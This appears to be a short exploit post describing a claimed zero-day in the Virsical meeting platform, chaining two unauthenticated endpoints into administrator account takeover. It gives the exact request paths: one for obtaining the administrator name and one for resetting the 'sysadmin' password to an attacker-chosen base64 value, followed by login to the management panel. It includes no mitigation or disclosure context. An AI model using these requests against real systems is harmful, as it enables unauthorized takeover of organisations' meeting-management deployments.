virsical meeting platform 0day exploit

2021/10/12
Tags: 

bug description

two unauthorized interface combined exploit , leads to administrator account takeover

exploit detail

  1. use unauthorized interface 1: /smartmeeting/smart/third/deleteRoom?roomId=618 to get administrator name

  1. use unauthorized interface 2: /iwork/userInfo/updatePwd?userId=sysadmin&pwd=xxxxxx to update administrator's password(new pwd is base64 encoded)

  1. successfully login to meeting manage panel with new password